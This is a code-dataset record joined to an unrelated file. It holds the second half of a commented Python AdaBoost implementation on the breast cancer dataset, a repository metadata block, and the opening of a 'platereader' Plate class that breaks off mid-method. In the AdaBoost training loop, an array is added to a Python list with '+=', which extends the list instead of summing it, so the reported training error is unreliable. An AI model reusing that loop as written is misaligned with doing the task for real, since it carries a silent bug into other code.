# get the shuffled indices
data_index = Random_number(len(data_set))
# split the dataset (X is the data, y the labels) using the returned indices
x_train = data_set[data_index[:train_size]]
x_test = data_set[data_index[train_size:]]
y_train = target_data[data_index[:train_size]]
y_test = target_data[data_index[train_size:]]
return x_train, x_test, y_train, y_test
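# Illustrative numbers (assuming the 569-sample breast cancer dataset used below): with size=0.2,
# train_size = int(0.8 * 569) = 455, so 455 samples go to the training set and 114 to the test set.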
def Caculation_error_Gx(x_train, y_train, n, div, rule, D):
"""
Compute the weighted classification error
:param x_train: training data
:param y_train: training labels
:param n: feature to operate on
:param div: split point (threshold)
:param rule: which side of the split gets the positive label
:param D: weight distribution
:return: predictions, classification error
"""
# initialise the classification error to 0
error = 0
# Peel the column of feature n out of the training matrix into an array, since the other
# elements are not needed and operating directly on the large training set would be slow.
x = x_train[:, n]
# Convert the labels to an array as well; converting x and y is purely for speed.
# Tests show a large performance gain compared to operating on the originals directly.
y = y_train
predict = []
# The labels for "smaller than" and "greater than" depend on the case at hand, so set them here.
if rule == 'LisOne': L = 1; H = -1
else: L = -1; H = 1
# iterate over all samples for this feature
for i in range(x_train.shape[0]):
if x[i] < div:
# If the value is below the split point, predict L:
# if "smaller than div" is defined as 1, then L is 1,
# if it is defined as -1, then L is -1.
predict.append(L)
# If the prediction is wrong, add the weight of the misclassified sample to the error (Eq. 8.1)
if y[i] != L:
error += D[i]
elif x[i] >= div:
# same idea as above
predict.append(H)
if y[i] != H:
error += D[i]
# Return the predictions and the classification error e.
# The predictions are needed later: in step 4 of algorithm 8.1, Eq. 8.4 contains Gx inside the exp,
# and they are used there to update the new D.
return np.array(predict), error
def CreateSingleBoostingTree(x_train, y_train, D):
"""
Create a single-layer boosting tree (decision stump)
:param x_train: training dataset
:param y_train: training labels
:param D: weight distribution
:return: single-layer boosting tree
"""
# get the number of samples and the number of features
m, n = np.shape(x_train)
# Dictionary for the single-layer tree, used to store the parameters of the current layer.
# The dictionary can be regarded as representing one layer of the boosting tree.
singleBoostTree = {}
# Initialise the classification error; it appears in step (2)(b) of algorithm 8.1.
# The error can be at most 100%, so initialise it to 1.
singleBoostTree['error'] = 1
# Iterate over every feature to find the one most suitable for splitting.
for i in range(n):
# The features have been binarised to 0 and 1, so -0.5, 0.5 and 1.5 are the three candidate split points.
for div in [-0.5, 0.5, 1.5]:
# When splitting positive and negative examples within a single feature there are two cases:
# values below the threshold may be 1 and above -1, or below -1 and above 1.
# Both cases have to be tried while searching for the best stump.
# LisOne: Low is one: values below the threshold are 1
# HisOne: High is one: values above the threshold are 1
for rule in ['LisOne', 'HisOne']:
# Split on feature i at value div and get the predictions and classification error for this setting.
Gx, error = Caculation_error_Gx(x_train, y_train, i, div, rule, D)
# If the classification error e is smaller than the current minimum, keep it as the new minimum.
if error < singleBoostTree['error']:
singleBoostTree['error'] = error
# Also store the best split point, split rule, predictions and feature index,
# which are needed to update D and for later predictions.
singleBoostTree['div'] = div
singleBoostTree['rule'] = rule
singleBoostTree['Gx'] = Gx
singleBoostTree['feature'] = i
# return the single-layer boosting tree
return singleBoostTree
def CreateBoostingTree(x_train, y_train, treeNum = 50):
"""
Create the boosting tree
The construction follows "8.1.2 AdaBoost algorithm", algorithm 8.1
:param x_train: training dataset
:param y_train: training labels
:param treeNum: number of layers (trees)
:return: boosting tree
"""
# convert the data and labels to array form
trainDataArr = np.array(x_train)
trainLabelArr = np.array(y_train)
# running final prediction, updated after every layer that is added
finalpredict = [0] * len(trainLabelArr)
# get the number of training samples and the number of features
m, n = np.shape(trainDataArr)
# initialise D to 1/N according to step (1) of algorithm 8.1
D = [1 / m] * m
# initialise the boosting tree list; each entry is one layer
tree = []
# loop to build the boosting tree
for i in range(treeNum):
# get the boosting tree of the current layer
curTree = CreateSingleBoostingTree(trainDataArr, trainLabelArr, D)
# compute alpha for the current layer according to Eq. 8.2
alpha = 1 / 2 * np.log((1 - curTree['error']) / curTree['error'])
# get the predictions of the current layer, used in the next step to update D
Gx = curTree['Gx']
# Update D according to Eq. 8.4.
# The book's formula updates one w of D at a time; looping until every w has been updated would be
# cumbersome to write (not slow, just tedious), so the update is done in vectorised form and
# one expression updates all w at once.
# The expression needs some linear algebra; updating each w separately would work just as well.
# np.multiply(trainLabelArr, Gx): the y*Gm(x) inside the exp, a row vector with entries yi*Gm(xi)
# np.exp(-1 * alpha * np.multiply(trainLabelArr, Gx)): the row vector above, with every entry
# multiplied by -alpha_m and exponentiated; same as the book's formula, except it acts on a vector instead of a scalar
# D is a row vector that takes the place of the w_mi in the formula, and the normalising sum is Zm
# The book's formula yields one number w at a time and all of them together form the new D;
# here the whole vector is obtained directly, its elements being all the w.
# The result is essentially the same.
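# In formula form (Eq. 8.4), this is what the next lines compute:
#   w_{m+1,i} = w_{m,i} * exp(-alpha_m * y_i * Gm(x_i)) / Z_m
#   Z_m       = sum_i w_{m,i} * exp(-alpha_m * y_i * Gm(x_i))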
D = np.multiply(D, np.exp(-1 * alpha * np.multiply(trainLabelArr, Gx)))
D = D / sum(D)
# add alpha to the parameters of the current layer; it is needed at prediction time
curTree['alpha'] = alpha
# append the current layer to the boosting tree list
tree.append(curTree)
# ----- the code below is only auxiliary and can be removed ---------------
# add the current layer times alpha to the result according to Eq. 8.6, giving the current final prediction
finalpredict += alpha * Gx
# compute the error between the current final prediction and the actual labels
error = sum([1 for i in range(len(x_train)) if np.sign(finalpredict[i]) != trainLabelArr[i]])
# compute the current final error rate
finalError = error / len(x_train)
# if the error is 0 we can stop early, there is no point in computing further
if finalError == 0:
return tree
# print some information
print('iter:%d:%d, single error:%.4f, final error:%.4f'%(i, treeNum, curTree['error'], finalError))
# return the whole boosting tree
return tree
def predict(x, div, rule, feature):
"""
Output the prediction of a single layer
:param x: sample to predict
:param div: split point
:param rule: split rule
:param feature: feature to operate on
:return: predicted label (1 or -1)
"""
# define the labels below and above the split point according to the split rule
if rule == 'LisOne':
L = 1; H = -1
else:
L = -1; H = 1
# determine the prediction
if x[feature] < div:
return L
else:
return H
def model_test(x_test, y_test, tree):
"""
Test the model
:param x_test: test dataset
:param y_test: test labels
:param tree: boosting tree
:return: accuracy
"""
# error counter
errorCnt = 0
# iterate over every test sample
for i in range(len(x_test)):
# prediction value, initialised to 0
res = 0
# According to Eq. 8.6 of algorithm 8.1,
# the prediction is a sum, so the result of every layer has to be accumulated.
# iterate over every layer of the tree
for curTree in tree:
# get the parameters of this layer
div = curTree['div']
rule = curTree['rule']
feature = curTree['feature']
alpha = curTree['alpha']
# add the result of the current layer to the prediction
res += alpha * predict(x_test[i], div, rule, feature)
# take the sign of the prediction: 1 if it is greater than 0, -1 otherwise
if np.sign(res) != y_test[i]:
errorCnt += 1
# return the accuracy
return float(1 - errorCnt / len(x_test))
# binarise all the data (excluding the labels)
def find_init_div(data):
inMat = data.copy()
# compute the mean of every column
# axis=0 means the mean is taken over the rows of each column, giving the mean of every column
inMeans = np.mean(inMat, axis=0)
# centre every feature on its column mean
inMat = inMat - inMeans
inMat = inMat.applymap(lambda x: int(0) if x <= 0 else 1)
inMat = np.array(inMat)
return inMat
if __name__ == '__main__':
# start time
start = time.time()
# get the training and test data
breastcancer = datasets.load_breast_cancer()
# print(breastcancer)
# create a DataFrame (tabular data structure)
df = pd.DataFrame(breastcancer.data, columns=breastcancer.feature_names)
# append a new column 'label' at the end, holding breastcancer.target (a Series)
df['label'] = breastcancer.target
print(df)
# Find the initial thresholds of the training data and binarise it accordingly: values above the threshold become 1, values below become 0, which simplifies the later computations.
# shuffle the data
data = find_init_div(df.iloc[:, :-1])
print(data)
target = np.array(df.iloc[:, -1])
print(target)
x_train, x_test, y_train, y_test = Train_test_split(data, target)
# print(x_train)
# print(x_test)
# convert to a binary classification task
# replace the labels: map 0,1 to -1,1
y_train = np.array([int(1) if i == 1 else int(-1) for i in y_train])
# print(x, y)
# replace the labels: map 0,1 to -1,1
y_test = np.array([int(1) if i == 1 else int(-1) for i in y_test])
# create the boosting tree
print('start init train')
tree = CreateBoostingTree(x_train, y_train, 100)
# test
print('start to test')
accuracy = model_test(x_test, y_test, tree)
print('the accuracy is:%.4f' % (accuracy * 100), '%')
print(accuracy)
# end time
end = time.time()
print('time span:', end - start)
# the accuracy is:97.0760 %
|
BobTsang1995/StatisticalLearningMethod-python-
|
AdaBoost.py
|
AdaBoost.py
|
py
| 12,463 |
python
|
zh
|
code
| 2 |
github-code
|
6
|
[
{
"api_name": "random.seed",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "random.shuffle",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 118,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 161,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "numpy.log",
"line_number": 176,
"usage_type": "call"
},
{
"api_name": "numpy.multiply",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "numpy.sign",
"line_number": 201,
"usage_type": "call"
},
{
"api_name": "numpy.sign",
"line_number": 259,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 269,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 273,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 278,
"usage_type": "call"
},
{
"api_name": "sklearn.datasets.load_breast_cancer",
"line_number": 281,
"usage_type": "call"
},
{
"api_name": "sklearn.datasets",
"line_number": 281,
"usage_type": "name"
},
{
"api_name": "pandas.DataFrame",
"line_number": 284,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 295,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 303,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 306,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 319,
"usage_type": "call"
}
] |
20269902024
|
import os.path
import math
import numpy
import json
import bz2
import platereader
from platereader.replicate import Replicate
from platereader.statusmessage import StatusMessage, Severity
from platereader.csvunicode import CsvFileUnicodeWriter, CsvFileUnicodeReader
from platereader.parser import tecan, bioscreen
class Plate(object):
"""
Class containing the wells and holding plate-wide parameters.
"""
_parser2module = platereader.parser.modulenameToModule(
list(platereader.parser.getModulesOfNamespace(platereader.parser)),
replace='platereader.parser.',
lower=True)
_isNotPlateParameter={
'allowMaxGrowthrateAtLowerCutoff': True,
'allowGrowthyieldSlopeNStderrAwayFromZero': True,
}
def __init__(self,filename=None,fileformat=None,
time=None,rawOds=None,
sampleIds=None,conditions=None,wellids=None,plateId=None):
"""
Constructor.
If filename is not None and fileformat is None some heuristics
are used to identify the file format.
:param filename: name of serialised Plate or ascii file exported by the plate reader.
:type filename: str
:param fileformat: string indicating the format ('gat', 'tecan')
:type fileformat: str
:param time: array of timepoints when optical density was measured
:type time: numpy.array(float)
:param rawOds: list of optical density arrays
:type rawOds: list( numpy.array(float) )
:param sampleIds: list of sample names corresponding to the array of optical densities
:type sampleIds: list(str)
:param conditions: list of conditions under which the samples were grown
:type conditions: list(str)
:param plateId: name of this plate
:type plateId: str
"""
self.plateId=None
self._rawOd=None
self.wells=None
self.time=None
self.temperature=None
self.timeunit=None
self._inheritableParameters={}
# default parameters
self._inheritableParameters['maxGrowthLowerTimeCutoff']=None
self._inheritableParameters['maxGrowthUpperTimeCutoff']=None
self._inheritableParameters['allowMaxGrowthrateAtLowerCutoff']=False
self._inheritableParameters['allowGrowthyieldSlopeNStderrAwayFromZero']=1
# pure plate parameters
self._inheritableParameters['logOdCutoff']=None
self._inheritableParameters['lagAtLogOdEquals']=-5
self._inheritableParameters['slidingWindowSize']=10
self._inheritableParameters['hdCorrectionLinear']=None
self._inheritableParameters['hdCorrectionQuadratic']=None
self._inheritableParameters['hdCorrectionCubic']=None
self._inheritableParameters['smoothingK']=5
self._inheritableParameters['smoothingS']=0.01
self._loadStatus=StatusMessage()
self._capitaliseBackgroundIds=['blank','background']
self._clearMetadata()
if filename is not None:
if not os.path.exists(filename):
raise IOError("No such file or directory: '"+filename+"'")
if fileformat is None:
if filename.endswith('.gat'):
fileformat='gat'
else:
scorefileformat=[]
for fileformat in Plate._parser2module:
score=Plate._parser2module[fileformat].isPlateFormat(filename)
if score > 0.:
scorefileformat.append({'score': score, 'fileformat': fileformat})
scorefileformat = sorted(scorefileformat, key=lambda k: k['score'],reverse=True)
if not len(scorefileformat):
raise Plate.UnknownFileFormat(filename,detailedError='Cannot determine file format')
fileformat=scorefileformat[0]['fileformat']
if fileformat == 'gat':
self._load(filename)
elif fileformat in Plate._parser2module:
time, rawOd, sampleIds, conditions, plateId, temperature, wellids=Plate._parser2module[fileformat].parse(filename)
self._initFromArrays(time,rawOd,sampleIds,conditions,plateId=plateId,temperature=temperature,wellids=wellids)
else:
raise Plate.UnknownFileFormat(filename,serFormat=fileformat)
self.readfileformat=fileformat
elif rawOds is not None:
self._initFromArrays(time,rawOds,sampleIds,conditions,plateId=plateId,wellids=wellids)
else:
raise RuntimeError('could not construct Plate, neither filename nor arrays given')
self.modified=False
def _clearReplicateGroups(self):
if hasattr(self,'replicateGroups'):
for tc in self.replicateGroups:
# NOTE invalidating here so code holding references to these fails
tc._invalidate()
self.replicateGroups=None
self._backgroundGroupIndices=None
self._sampleConditionToReplicateGroupIdcs=None # an associative array mapping replicate groups by sample ID to a list of Replicate object indices
self._conditionToReplicateGroupIdx=None # an associative array mapping condition to a list of replicate group object indices
def _clearMetadata(self):
self._clearReplicateGroups()
self._setBackgroundForAllReplicates(None)
self._conditionToWellIdx=None # an associative array mapping condition to a list of Replicate objects
self._sampleConditionToWellIdcs=None # an associative array mapping wells (sample IDs) to a list of Replicate object indices
def _load(self,filename):
with bz2.BZ2File(filename, 'r') as rfile:
pickled=rfile.read().decode("utf-8")
try:
unpickled = json.loads(pickled)
except ValueError as err:
raise Plate.UnknownFileFormat(filename,detailedError=str(err))
return self._deserialise(unpickled,filename)
def _deserialise(self,unpickled,filename):
if 'format' not in unpickled:
raise Plate.UnknownFileFormat(filename,detailedError='no "format" keyword found in file')
serFormatVersion=unpickled['formatversion'] if 'formatversion' in unpickled else 'undefined'
if unpickled['format'] != 'opticaldensityplate' or serFormatVersion != '1':
raise Plate.UnknownFileFormat(filename,serFormat=unpickled['format'],serFormatVersion=serFormatVersion)
parkeys=[
# default parameters
'maxGrowthLowerTimeCutoff',
'maxGrowthUpperTimeCutoff',
'allowMaxGrowthrateAtLowerCutoff',
'allowGrowthyieldSlopeNStderrAwayFromZero',
# pure plate parameters
'logOdCutoff',
'lagAtLogOdEquals',
'slidingWindowSize',
'hdCorrectionLinear',
'hdCorrectionQuadratic',
'hdCorrectionCubic',
'smoothingK',
'smoothingS'
]
# reset these to make sure defaults given to constructor are not used for serialised plate
for par in self._inheritableParameters:
self._inheritableParameters[par]=None
self.plateId=unpickled['plateId']
self.time=numpy.array(unpickled['time'],dtype=float)
self.timeunit=unpickled['timeunit']
# default parameters, some of which can be overridden by the individual replicates
for par in parkeys:
self._inheritableParameters[par]=unpickled[par]
if 'temperature' in unpickled:
self.temperature=numpy.array(unpickled['temperature'],dtype=float)
self._rawOd=[]
for lst in unpickled['rawOd']:
self._rawOd.append(numpy.array(lst,dtype=float))
self.wells=[]
for tcup in unpickled['wells']:
self.wells.append(Replicate(_unpickled=tcup,parentPlate=self,_serialiseFormat=unpickled['format']))
self.replicateGroups=[]
for tcup in unpickled['replicateGroup']:
comptc=Replicate(_unpickled=tcup,parentPlate=self,_serialiseFormat=unpickled['format'],isReplicateGroup=True)
self.replicateGroups.append(comptc)
# set parental replicate group of the children
for childtc in comptc.childWells():
childtc._setReplicateGroupParent(comptc)
# deferred to here: set the background index
for tc in self.wells:
if tc._tmp_backgroundIndex is not None:
tc._setBackgroundIndex(tc._tmp_backgroundIndex)
for tc in self.replicateGroups:
if tc._tmp_backgroundIndex is not None:
tc._setBackgroundIndex(tc._tmp_backgroundIndex)
# reset background indices, as these have been initialised
# before setting the replicate's backgrounds
self._backgroundWellIndices=None
self._backgroundGroupIndices=None
self._setBackgroundStatus()
def _serialise(self):
"""
Generates a dictionary of the plate data and parameters.
For internal use only.
"""
parkeys=[
# default parameters
'maxGrowthLowerTimeCutoff',
'maxGrowthUpperTimeCutoff',
'allowMaxGrowthrateAtLowerCutoff',
'allowGrowthyieldSlopeNStderrAwayFromZero',
# pure plate parameters
'logOdCutoff',
'lagAtLogOdEquals',
'slidingWindowSize',
'hdCorrectionLinear',
'hdCorrectionQuadratic',
'hdCorrectionCubic',
'smoothingK',
'smoothingS'
]
sr=dict()
sr["format"]='opticaldensityplate'
sr["formatversion"]='1' # this is an unsigned integer
sr['plateId']=self.plateId
sr['time']=self.time.tolist()
sr['timeunit']=self.timeunit
for key in parkeys:
sr[key]=self._inheritableParameters[key]
if self.temperature is not None:
sr['temperature']=self.temperature.tolist()
sr['rawOd']=[]
for raw in self._rawOd:
sr['rawOd'].append(raw.tolist())
sr['wells']=[]
for tc in self.wells:
sr['wells'].append(tc._serialise())
sr['replicateGroup']=[]
for tc in self.replicateGroups:
sr['replicateGroup'].append(tc._serialise())
return sr
def save(self,filename):
"""
Saves the plate content in a file.
:param filename: Name of the file.
:type filename: str
:return: StatusMessage/None -- non-fatal notifications.
"""
status=None
if not filename.endswith('.gat'):
root, ext = os.path.splitext(filename)
status=StatusMessage(
key='Saving file',shortmsg='wrongExtension',
longmsg=('GATHODE uses a file extension that is different from "'+ext+'". '
+'This means that a future version of this program will not be able to open this file with the graphical user interface. '
+'Please save the file with the ".gat" extension.'),
severity=Severity.warning)
sr=self._serialise()
pickled = json.dumps(sr)
with bz2.BZ2File(filename, 'w') as wfile:
wfile.write(pickled.encode('utf-8'))
self.modified=False
return status
def _explicitlySetParsInChildWells(self,par):
"""
Explicitly set parameters in wells to their inherited values.
This can be used when replicate groups get removed
(e.g. setting new metadata) but the parameters should be
preserved. You most likely want to call
_reduceExplicitParameter once new replicate groups have been
created.
For internal use only.
"""
for tc in self.replicateGroups:
for child in tc.childWells():
# copy parameters from replicate group to the child
child._setExplicitParameter(par,child.getParameter(par))
def _reduceExplicitParameter(self,par):
"""
Sets the parameter par of self and wells such that it is shared by most of its children.
For internal use only.
:param par: the parameter for which a smaller set of values is created
:type par: string
"""
# check what could be the plate default for this parameter
parvals=Plate._getChildParvalOccurrence(self,par)
platedefault=Plate._chooseDefaultFromOccurrences(parvals)
# set parameters in replicate groups; if one of a groups's children has the same value
# as the platedefault use that one, otherwise try find another value for the group
for tc in self.replicateGroups:
Plate._reduceExplicitParametersHelper(tc,par,platedefault)
# now set the plate default (important: this has to be done *after* the Replicates are changed!)
Plate._reduceExplicitParametersHelper(self,par,platedefault)
return platedefault
@staticmethod
def _reduceExplicitParametersHelper(obj,par,parentdefault):
"""
Helper function for _reduceExplicitParameter
For internal use only.
:param obj: the object (Plate or replicate group) whose children are inspected
:type obj: Plate/Replicate
:param par: the parameter for which a smaller set of values is created
:type par: string
Will be called with plate and Replicate objects.
"""
# gather occurrence of each value for this parameter in children
parvals=Plate._getChildParvalOccurrence(obj,par)
# the value that occurs most often will become the replicate group's value
newdefaultval=Plate._chooseDefaultFromOccurrences(parvals,parentdefault)
# only if none of the children got value None we can copy values up
if newdefaultval is None:
return
# delete consensus value from children
for child in Plate._getChildren(obj):
if newdefaultval == child.getParameter(par):
child._setExplicitParameter(par,None)
# set consensus value for replicate group parent
obj._setExplicitParameter(par,newdefaultval)
@staticmethod
def _getChildParvalOccurrence(obj,par):
"""
Return count of parameter values of all leaf children (at the lowest level of the hierarchy).
For internal use only.
:return: dict -- { value1: countValue1, value2: countValue2, ...}
"""
if isinstance(obj, Replicate) and not obj.isReplicateGroup():
# this is a single well
val=obj.getParameter(par)
return {val: 1}
else:
parvals={}
for child in Plate._getChildren(obj):
childparvals=Plate._getChildParvalOccurrence(child,par)
# assemble childrens' results into the main dictionary
for val in childparvals:
if val not in parvals:
parvals[val]=0
parvals[val]+=childparvals[val]
return parvals
@staticmethod
def _chooseDefaultFromOccurrences(parvals,parentdefault=None):
"""
Return the value of a parameter that occurs most often in leaf children.
For internal use only.
Can be called both without parentdefault (for the whole plate)
and with parentdefault (for ReplicateGroups).
:param parvals: output from _getChildParvalOccurrence
:type parvals: dict
:return: float -- the most frequently occurring parameter value for this plate or ReplicateGroup
"""
if None in parvals:
return None
maxcnt=0
maxval=None
parvalkeys=list(parvals.keys())
parvalkeys.sort()
for val in parvalkeys:
# if there is a value corresponding to the plate default choose that one
if parentdefault is not None and val == parentdefault:
return parentdefault
# choose maximal occurring as default
if parvals[val] > maxcnt:
maxval=val
maxcnt=parvals[val]
return maxval
@staticmethod
def _getChildren(obj):
if isinstance(obj, Plate):
# this is a plate
return obj.replicateGroups
else:
# this is a replicate group
return obj.childWells()
@staticmethod
def capitaliseId(sampleId,capitaliseThese):
"""
Capitalise id if in given list.
:param sampleId: sample id; if this matches capitaliseThese it will be capitalised
:type sampleId: str
:param capitaliseThese: list of sample ids that correspond to samples that should be capitalised
:type capitaliseThese: list(str)
:return: str -- sample id (capitalised if it matches one of capitaliseThese)
"""
for bgid in capitaliseThese:
if sampleId.upper() == bgid.upper():
return bgid.upper()
return sampleId
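# Example: with capitaliseThese=['blank', 'background'], capitaliseId('Blank', ...) returns 'BLANK',
# while capitaliseId('sampleA', ...) comes back unchanged.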
def _initFromArrays(self,time,rawOd,sampleIds,conditions,plateId=None,temperature=None,wellids=None):
"""
Initialises a plate from numpy arrays.
For internal use only.
:param time: array of timepoints when optical density was measured
:type time: numpy.array(float)
:param rawOd: list of optical density arrays
:type rawOd: list( numpy.array(float) )
:param sampleIds: list of sample names corresponding to the array of optical densities
:type sampleIds: list(str)
:param conditions: list of conditions under which the samples were grown
:type conditions: list(str)
:param plateId: name of this plate
:type plateId: str
:param temperature: array of the temperature
:type temperature: numpy.array(float)
:param wellids: array of ids for the wells (e.g. A1 to P24)
:type wellids: list(str)
"""
if len(rawOd) != len(sampleIds):
raise RuntimeError('number of raw optical density arrays is different from number of sample ids')
if len(sampleIds) != len(conditions):
raise RuntimeError('number of sample ids is different from number of conditions')
if wellids is not None and len(wellids) != len(set(wellids)):
raise RuntimeError('ids in wellids are not unique')
self.plateId=plateId
self.time=time/3600.
self.timeunit="h"
self._rawOd=rawOd
# make sure that background is correctly identified even if case is different
newSampleIds=[]
for sampleid in sampleIds:
newSampleIds.append(Plate.capitaliseId(sampleid,self._capitaliseBackgroundIds))
# create replicate objects for single wells from data (NOTE ids may exist multiple times, therefore this is not an associative array)
self.wells=[]
tcidx=0
for sampleid in newSampleIds:
wellid = [wellids[tcidx]] if wellids is not None else None
self.wells.append(Replicate(self,[tcidx],sampleid,conditions[tcidx],wellid))
# NOTE that on purpose this index is only increased for samples (not for time, temperature, ...)
tcidx+=1
self._createReplicateGroupsFromSampleIdsNConditions()
# use guessed background sampleIds to set background of single well and replicate groups
self._setBackgroundForAllReplicates(self._guessBackgroundSampleIds())
def wellMetadataOk(self,metadata):
"""
Check that the given metadata (i.e. sample id, growth condition) is valid and can be applied.
This basically checks that there is the right number of
metadata entries and that each of them contains a sample id and a condition.
:param metadata: array of metadata dictionaries
:type metadata: list(dict)
:return: bool, StatusMessage -- True if ok, False otherwise (and a StatusMessage with details)
"""
if len(metadata) != len(self.wells):
return False, StatusMessage(
key='Wrong metadata length:',shortmsg='metadata:wrongLength',
longmsg=('Number of metadata entries ('+str(len(metadata))+
') is different from number of wells '+str(len(self.wells))),
severity=Severity.failed)
idx=0
for metdat in metadata:
idx+=1
if len(metdat.keys()) != 2 or 'sample' not in metdat or 'condition' not in metdat:
thekeys='"'+('" "'.join(sorted(metdat.keys())))+'"' if len(metdat.keys()) else 'nothing'
return False, StatusMessage(
key='Wrong metadata elements:',shortmsg='metadata:wrongLength',
longmsg=('metadata for entry '+str(idx)+' contains '+thekeys+
', but should contain "condition" and "sample"'),
severity=Severity.failed)
return True, StatusMessage()
def setWellMetadata(self,metadata):
"""
Set the metadata (e.g. sample id, growth condition) of the wells.
:param metadata: array of metadata dictionaries
:type metadata: list(dict)
"""
metok, message = self.wellMetadataOk(metadata)
if not metok:
raise Plate.BadMetadata(str(message))
# propagate parameters to the wells before deleting replicate groups
for par in self.wells[0]._inheritableParameters.keys():
self._explicitlySetParsInChildWells(par)
# clear everything that depends on metadata
self._clearMetadata()
# set metadata of the wells
wellit=self.wells.__iter__()
for metdat in metadata:
metdat['sample']=Plate.capitaliseId(metdat['sample'],self._capitaliseBackgroundIds)
well=next(wellit)
well._setMetadata(metdat)
# create replicate groups based on sample ids and conditions
self._createReplicateGroupsFromSampleIdsNConditions()
# use guessed background sampleIds to set background of single well and replicate groups
self._setBackgroundForAllReplicates(self._guessBackgroundSampleIds())
# propagate parameters from the wells to the replicate groups (or plate) if possible
for par in self.wells[0]._inheritableParameters.keys():
self._reduceExplicitParameter(par)
def wellMetadata(self):
"""
Return the metadata of the wells.
:return: list(dict) -- metadata
"""
metadata=[]
for well in self.wells:
metadata.append(well._getMetadata())
return metadata
def _setupBackgroundIndices(self):
"""
Set self._backgroundGroupIndices and self._backgroundWellIndices.
Records the indices of tc.background (which are replicate
groups) for all wells and replicateGroups and also the indices
of the underlying background wells.
For internal use only.
"""
self._backgroundGroupIndices=set()
self._backgroundWellIndices=set()
if self.wells:
for tc in self.wells:
if tc.background:
self._backgroundGroupIndices.add(self._indexOfReplicateGroup(tc.background))
if self.replicateGroups:
for tc in self.replicateGroups:
if tc.background:
self._backgroundGroupIndices.add(self._indexOfReplicateGroup(tc.background))
for idx in self._backgroundGroupIndices:
for chldidx in self.replicateGroups[idx].childWellIndices():
self._backgroundWellIndices.add(chldidx)
def _guessBackgroundSampleIds(self):
"""
Guess sample ids of background wells ("BLANK" or "BACKGROUND")
For internal use only.
"""
backgroundKeys={}
for tc in self.wells:
if tc.sampleid == "BLANK" or tc.sampleid == "BACKGROUND":
backgroundKeys[tc.sampleid]=1
backgroundSampleIds=sorted(list(backgroundKeys.keys()))
return backgroundSampleIds
def _setBackgroundStatus(self):
"""
Add conditions/samples for which no background was found to self._loadStatus
This should be called when the background was set for some wells/replicate groups.
For internal use only.
"""
self._loadStatus.removeStatusesWithKey('No background samples:')
self._loadStatus.removeStatusesWithKey('No background for some samples:')
backgroundSampleIds=set()
for idx in self.backgroundReplicateGroupIndices():
backgroundSampleIds.add(self.replicateGroups[idx].sampleid)
for idx in self.backgroundWellIndices():
backgroundSampleIds.add(self.wells[idx].sampleid)
if len(backgroundSampleIds) < 1:
self._loadStatus.addStatus(
StatusMessage(
key='No background samples:',shortmsg='plateinit:noBackground',
longmsg=('No background (blank) wells could be identified.'+
' This means no growth parameters will be extracted'),
severity=Severity.warning)
)
return
noBackground={}
for tc in self.nonBackgroundWells():
if tc.background is None:
if tc.condition not in noBackground:
noBackground[tc.condition]={}
if tc.sampleid not in noBackground[tc.condition]:
noBackground[tc.condition][tc.sampleid]=[]
noBackground[tc.condition][tc.sampleid].append(tc)
for tc in self.nonBackgroundReplicates():
if tc.background is None:
if tc.condition not in noBackground:
noBackground[tc.condition]={}
if tc.sampleid not in noBackground[tc.condition]:
noBackground[tc.condition][tc.sampleid]=[]
noBackground[tc.condition][tc.sampleid].append(tc)
if len(noBackground.keys()):
affected=''
for condition in sorted(noBackground):
if condition is None or condition == '':
affected+='no condition:'
else:
affected+=condition+':'
for sampleid in sorted(noBackground[condition]):
affected+=' '+sampleid
affected+='\n'
self._loadStatus.addStatus(
StatusMessage(
key='No background for some samples:',shortmsg='plateinit:noBackgroundForSomeSamples',
longmsg=('For some conditions no background (blank) could be identified.'+
' This means no growth parameters will be extracted. The affected samples are:\n'+
affected),
severity=Severity.warning)
)
def backgroundReplicateGroupIndices(self):
"""
Return indices into self.replicateGroups for replicate groups being listed as background.
:return: list(int) -- indices of background replicate groups
"""
if self._backgroundGroupIndices is None:
self._setupBackgroundIndices()
return self._backgroundGroupIndices
def backgroundReplicateGroups(self):
"""
Return replicate groups being listed as background.
:return: list(Replicate) -- replicate groups listed as background
"""
tcs=[]
for idx in self.backgroundReplicateGroupIndices():
tcs.append(self.replicateGroups[idx])
return tcs
def backgroundWellIndices(self):
"""
Return indices into self.wells for wells being listed as background.
:return: list(int) -- indices of background wells
"""
if self._backgroundWellIndices is None:
self._setupBackgroundIndices()
return self._backgroundWellIndices
def backgroundWells(self):
"""
Return wells being listed as background.
:return: list(Replicate) -- wells listed as background
"""
tcs=[]
for idx in self.backgroundWellIndices():
tcs.append(self.wells[idx])
return tcs
def _createSampleConditionToWellIndices(self):
"""
Create a mapping to quickly find single-well objects based on sample id and condition.
For internal use only.
"""
# gather sampleids and conditions
self._conditionToWellIdx={}
self._sampleConditionToWellIdcs={}
tcidx=0
for tc in self.wells:
# add well to the condition mapping
if tc.condition not in self._conditionToWellIdx:
self._conditionToWellIdx[tc.condition]=[]
self._conditionToWellIdx[tc.condition].append(tcidx)
# add well to the replicate mapping (sampleid and condition)
if tc.sampleid not in self._sampleConditionToWellIdcs:
self._sampleConditionToWellIdcs[tc.sampleid]={}
if tc.condition not in self._sampleConditionToWellIdcs[tc.sampleid]:
self._sampleConditionToWellIdcs[tc.sampleid][tc.condition]=[]
self._sampleConditionToWellIdcs[tc.sampleid][tc.condition].append(tcidx)
tcidx+=1
def _createReplicateGroupsFromSampleIdsNConditions(self):
"""
Create replicate groups by grouping wells of the same sample id and condition.
For internal use only.
"""
if self._sampleConditionToWellIdcs is None:
self._createSampleConditionToWellIndices()
sampleids=list(self._sampleConditionToWellIdcs.keys())
sampleids.sort()
self.replicateGroups=[]
